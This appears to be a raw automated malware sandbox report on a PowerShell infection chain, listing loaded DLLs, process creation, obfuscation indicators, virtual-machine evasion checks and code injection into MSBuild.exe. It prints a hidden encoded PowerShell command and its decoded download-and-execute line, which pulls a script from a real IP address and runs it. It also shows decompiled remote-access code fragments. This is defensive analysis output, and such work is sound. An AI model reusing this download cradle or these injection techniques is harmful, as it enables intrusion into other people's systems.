Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: avicap32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvfw32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\strztqek\strztqek.pdbhP source: powershell.exe, 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\strztqek\strztqek.pdb source: powershell.exe, 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: Memory
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA4B9FA pushad ; retf 3_2_00007FFC3DA4BA11
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA439DB pushad ; ret 3_2_00007FFC3DA439E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA439C0 pushad ; ret 3_2_00007FFC3DA439E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA48163 push ebx; ret 3_2_00007FFC3DA4816A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA47963 push ebx; retf 3_2_00007FFC3DA4796A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA400BD pushad ; iretd 3_2_00007FFC3DA400C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA4C2D3 push FFFFFFE8h; retf 3_2_00007FFC3DA4C2F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_01587DA0 push eax; iretd 11_2_01587DA1
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, ZWeKHcACrqflnHUlpASkjftZHOBqiCGxfOorUAdZkrOmPIGpYAEYlDjUDfcSBktOKHgysCqOwSaRrgkZilrIXHlBFuOPykyaXZBh.csHigh entropy of concatenated method names: 'RNYIlZekYV', 'mhavghSDao', 'RJCZOJicBQ', 'lLjVWaHjOv', 'PRxdPInpFz', 'nbPGahkZUC', 'RcIhJAYfyf', 'zJPFyZmzjf', 'vSxbCkWCUO', 'QHpmDNjpto'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, -Module-.csHigh entropy of concatenated method names: 'WQChyCMOoB', 'wCjkjynTqS', 'RKXkReWkCV', 'TTOiWGlcOj', 'sLaZaapxZt', 'ICjuSlTsqu', 'GCmsHDNanD', 'mlehAfJXjQ', 'OzkimrKupK', 'NTLuDQzIsx'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, WlNthHBjXcLliiJhHxJhAKzvqeYihFnVggvyGqNpTtyeBZRdsNgtVPImMsdcIsbrPQfcMlAqJtohlvUqnVQuyTZryjMnnLHBrgpL.cs High entropy of concatenated method names: 'UOqgmPJBBAaqyMOMBHTVQOECzndXMMQfgjwyFKhIkxPXjvPAXUZJntUfkNHZMLOOKUkpqphRAkLsYGtexDaSNgSMoqoRchWyIbno', 'IkpVvpJaAp', 'gjHDAsAUdE', 'SfqaMcihNU', 'IWSNOGKFWd', 'QulLcxMVnx', 'KczHMCUois', 'hCnFHkrUPT', 'HUXZOyTFXo', 'pmTpkFwkbl'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, fjqxEWSfhjmOpVWYVoOvOBjiLSFVYNUNstguePHXsMDdrnxqwJQVJdbDZiLMrXgtozwVPBTgHRdbXgQxuoyoXYdorCvWdVGuFkOS.cs High entropy of concatenated method names: 'RBBUQKoSaZGSsorcySwqwiEmgXcLlIwNsYGSMEymJkorVCDPDDVMOxvJXpNSHDHrDTAuIzpUujHlUmrEunhHMJZUCXUxQFFgDWOc', 'fzteTUjlPR', 'tEJHzVjVTG', 'EuJQmHqtJM', 'pccXtzCaOw', 'rlRIPDtNTd', 'AvQyIKQCRm', 'EPBdCrCLnZ', 'sigxotDabJ', 'nCAFlTlEpI'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, wmTozIgamPcaxfvFFmctQBuKKuDsAwVSEMuGqRGRpTdsOeOJUJNObIlUSjDfeNzQTjwKKOpOFkeXybVFGUyQIhRWBAOgnBNCtmyF.cs High entropy of concatenated method names: 'IdYgtYiQDowQnYykoJhMszjkajBdxBDlCqXCVrwJYasmeXSpcDnKeMniUNgkxftbKknXbWoXmxOrhWgcqmaUoThQcOIhlmmTGqBT', 'ghOQOHtMzy', 'jFkaIiHgJi', 'GEBMWCzsrI', 'VylGnmXvlj', 'lnfPjuyDiV', 'xUKSnBFbTm', 'hauQCLtEMv', 'lmUAXsyMDB', 'eWkwkaNtsL'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, kzkHNijcIBhDuDCjLWbDcxbZaqOsonKWseTXstfEWQeMjKwzFNNMaKmMykGxuROuRkkqJEQrRwGmtoQpToMBAYWIRgziMHkfbJVY.cs High entropy of concatenated method names: 'AgPbWvUEdatktqDfenUToByCfIFjlBkJsSPNyLEfdsFRNoOvefbOPcKYHnWoPKsCPKSBBQGsIPPVWGPQTjfgzvTqhRflPpptadcc', 'nBbZnrWMZo', 'iPleMAxGCW', 'oFWsMbJdzJ', 'sTpzzBIjip', 'QBZCesxmDp', 'ccwsrHEInl', 'HSmpWpAMEk', 'RnymfNGuot', 'ExAkHpwWhS'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, ZWeKHcACrqflnHUlpASkjftZHOBqiCGxfOorUAdZkrOmPIGpYAEYlDjUDfcSBktOKHgysCqOwSaRrgkZilrIXHlBFuOPykyaXZBh.cs High entropy of concatenated method names: 'RNYIlZekYV', 'mhavghSDao', 'RJCZOJicBQ', 'lLjVWaHjOv', 'PRxdPInpFz', 'nbPGahkZUC', 'RcIhJAYfyf', 'zJPFyZmzjf', 'vSxbCkWCUO', 'QHpmDNjpto'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, -Module-.cs High entropy of concatenated method names: 'WQChyCMOoB', 'wCjkjynTqS', 'RKXkReWkCV', 'TTOiWGlcOj', 'sLaZaapxZt', 'ICjuSlTsqu', 'GCmsHDNanD', 'mlehAfJXjQ', 'OzkimrKupK', 'NTLuDQzIsx'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, WlNthHBjXcLliiJhHxJhAKzvqeYihFnVggvyGqNpTtyeBZRdsNgtVPImMsdcIsbrPQfcMlAqJtohlvUqnVQuyTZryjMnnLHBrgpL.cs High entropy of concatenated method names: 'UOqgmPJBBAaqyMOMBHTVQOECzndXMMQfgjwyFKhIkxPXjvPAXUZJntUfkNHZMLOOKUkpqphRAkLsYGtexDaSNgSMoqoRchWyIbno', 'IkpVvpJaAp', 'gjHDAsAUdE', 'SfqaMcihNU', 'IWSNOGKFWd', 'QulLcxMVnx', 'KczHMCUois', 'hCnFHkrUPT', 'HUXZOyTFXo', 'pmTpkFwkbl'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, fjqxEWSfhjmOpVWYVoOvOBjiLSFVYNUNstguePHXsMDdrnxqwJQVJdbDZiLMrXgtozwVPBTgHRdbXgQxuoyoXYdorCvWdVGuFkOS.cs High entropy of concatenated method names: 'RBBUQKoSaZGSsorcySwqwiEmgXcLlIwNsYGSMEymJkorVCDPDDVMOxvJXpNSHDHrDTAuIzpUujHlUmrEunhHMJZUCXUxQFFgDWOc', 'fzteTUjlPR', 'tEJHzVjVTG', 'EuJQmHqtJM', 'pccXtzCaOw', 'rlRIPDtNTd', 'AvQyIKQCRm', 'EPBdCrCLnZ', 'sigxotDabJ', 'nCAFlTlEpI'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, wmTozIgamPcaxfvFFmctQBuKKuDsAwVSEMuGqRGRpTdsOeOJUJNObIlUSjDfeNzQTjwKKOpOFkeXybVFGUyQIhRWBAOgnBNCtmyF.cs High entropy of concatenated method names: 'IdYgtYiQDowQnYykoJhMszjkajBdxBDlCqXCVrwJYasmeXSpcDnKeMniUNgkxftbKknXbWoXmxOrhWgcqmaUoThQcOIhlmmTGqBT', 'ghOQOHtMzy', 'jFkaIiHgJi', 'GEBMWCzsrI', 'VylGnmXvlj', 'lnfPjuyDiV', 'xUKSnBFbTm', 'hauQCLtEMv', 'lmUAXsyMDB', 'eWkwkaNtsL'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, kzkHNijcIBhDuDCjLWbDcxbZaqOsonKWseTXstfEWQeMjKwzFNNMaKmMykGxuROuRkkqJEQrRwGmtoQpToMBAYWIRgziMHkfbJVY.cs High entropy of concatenated method names: 'AgPbWvUEdatktqDfenUToByCfIFjlBkJsSPNyLEfdsFRNoOvefbOPcKYHnWoPKsCPKSBBQGsIPPVWGPQTjfgzvTqhRflPpptadcc', 'nBbZnrWMZo', 'iPleMAxGCW', 'oFWsMbJdzJ', 'sTpzzBIjip', 'QBZCesxmDp', 'ccwsrHEInl', 'HSmpWpAMEk', 'RnymfNGuot', 'ExAkHpwWhS'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1540000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 3450000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 18C0000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4388
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5371
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 5541
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 4294
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 2.7 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep count: 4388 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep count: 5371 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068 Thread sleep time: -17524406870024063s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2984 Thread sleep time: -15679732462653109s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1232 Thread sleep count: 5541 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1232 Thread sleep count: 4294 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation
            Source: powershell.exe, 00000003.00000002.1368838282.0000028931817000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: MSBuild.exe, 0000000B.00000002.3713480379.0000000001651000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, Look.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, Look.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.0.csJump to dropped file
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $c=New-Object Net.WebClient;IEX $c.DownloadString('http://92.255.85.2/a.mp4')
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $c=New-Object Net.WebClient;IEX $c.DownloadString('http://92.255.85.2/a.mp4')Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1153008Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -noprofile -windowstyle hidden -e jabjad0atgblahcalqbpagiaagblagmadaagae4azqb0ac4avwblagiaqwbsagkazqbuahqaowbjaeuawaagacqaywauaeqabwb3ag4ababvageazabtahqacgbpag4azwaoaccaaab0ahqacaa6ac8alwa5adialgayaduanqauadganqauadialwbhac4abqbwadqajwapaa==
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -noprofile -windowstyle hidden -e jabjad0atgblahcalqbpagiaagblagmadaagae4azqb0ac4avwblagiaqwbsagkazqbuahqaowbjaeuawaagacqaywauaeqabwb3ag4ababvageazabtahqacgbpag4azwaoaccaaab0ahqacaa6ac8alwa5adialgayaduanqauadganqauadialwbhac4abqbwadqajwapaa==Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (this entry is listed six times in the report)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
